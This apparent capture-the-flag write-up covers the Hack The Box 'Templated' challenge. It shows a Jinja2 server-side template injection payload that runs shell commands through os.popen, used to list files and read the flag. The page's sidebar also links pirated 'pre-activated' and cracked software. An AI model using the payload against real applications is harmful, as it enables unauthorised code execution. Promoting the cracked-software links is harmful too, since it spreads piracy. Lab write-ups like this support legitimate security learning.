LEFT SIDEBAR AD

Hidden in mobile, Best for skyscrapers.

Simple Web Challenge on HTB | Templated

1 year ago 127
BOOK THIS SPACE FOR AD
ARTICLE AD

Hey folks, here is a simple web challenge for you…

The name of the challenge is Templated.

Web Challenge Templated

Let’s start by opening the web interface.

Flask/Jinja2

We can see that the site uses python, let’s look bit more…

Werkzeug/1.0.1 Python/3.9.0

The web uses Werkzeug/1.0.1 Python/3.9.0.

Vulnerable to SSTI

While doing basic tests we got that the site is vulnerable to SSTI!! 😋

SSTI = Server-Side Template Injection

I quickly searched Google and came across Gus Ralph’s write-up on Server Side Template Injection with Jinja2.

Let’s Exploit!!

Exploitation part is very basic.

Payload = {{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}

id command gets executed

Let’s try listing files.

Listing files

We found the flag.txt!! Read the file to get the flag.

Got the flag!

Yeahhyy!!💥We got the flag!!!

That way a simple SSTI challange!! Try it yourself ❤

Read Entire Article
  3. Simple Web Challenge on HTB | Templated

Related

Discovery Worth $$$ in KYC Verification Feature : Bug Bounty

Discovery Worth $$$ in KYC Verification Feature : Bug Bounty

How to Create a Cloud Lab for Anonymous Bug Bounty Hunting

How to Create a Cloud Lab for Anonymous Bug Bounty Hunting

Unraveling the Web of Price Manipulation Safeguarding Fairness in Markets

Unraveling the Web of Price Manipulation Safeguarding Fairness in Markets

Unveiling Order Processing Vulnerabilities Protecting Your Business in the Digital Era

Unveiling Order Processing Vulnerabilities Protecting Your Business in the Digital Era

5 bugs in one program $$$

5 bugs in one program $$$

Multiple Business Logic Errors in APPLE music/TV allowing bypass of parental controls

Multiple Business Logic Errors in APPLE music/TV allowing bypass of parental controls

Trending

1. Motorola Edge 50 Fusion
2. New Caledonia France
3. Sunil Chhetri
4. Neeraj Chopra
5. Inter Miami
6. Bridgerton Season 3
7. Panchayat
8. Chelsea
9. Man United vs Newcastle
10. Harshal Patel

Popular

1-click RCE in Electron Applications

1-click RCE in Electron Applications

Install waybackurls on Kali Linux

Install waybackurls on Kali Linux

Over 40 Apps With More Than 100 Million Installs Found Leaking AWS Keys

Over 40 Apps With More Than 100 Million Installs Found Leaking AWS Keys

Microsoft Office Professional Plus 2019 (x64 & x86) Multilingual + Pre-Activated

Microsoft Office Professional Plus 2019 (x64 & x86) Multilingual + Pre-Activated

Install DalFox on Kali Linux

Install DalFox on Kali Linux

Adobe Master Collection CC 2022 v25.08.2022 (x64) Multilingual Pre-Activated

Adobe Master Collection CC 2022 v25.08.2022 (x64) Multilingual Pre-Activated

Maxon CINEMA 4D Studio S22.123 (x64) Multilingual + Crack

Maxon CINEMA 4D Studio S22.123 (x64) Multilingual + Crack

‘We are not motivated by profits’ – Open Bug Bounty maintainers on finding a niche in the crowdsourced AppSec market

‘We are not motivated by profits’ – Open Bug Bounty maintainers on finding a niche in the crowdsourced AppSec market

Just Gopher It: Escalating a Blind SSRF to RCE for $15k

Just Gopher It: Escalating a Blind SSRF to RCE for $15k

SketchUp Pro 2020 v20.2.172 (x64) Multilingual + Patch

SketchUp Pro 2020 v20.2.172 (x64) Multilingual + Patch

BOOK THIS SPACE FOR AD
RIGHT SIDEBAR BOTTOM AD
Bengali (Bangladesh) Bengali (Bangladesh) · English (United States) English (United States) ·
About Us · Terms & Condition · Contact Us
© Security Alert 2024. All rights are reserved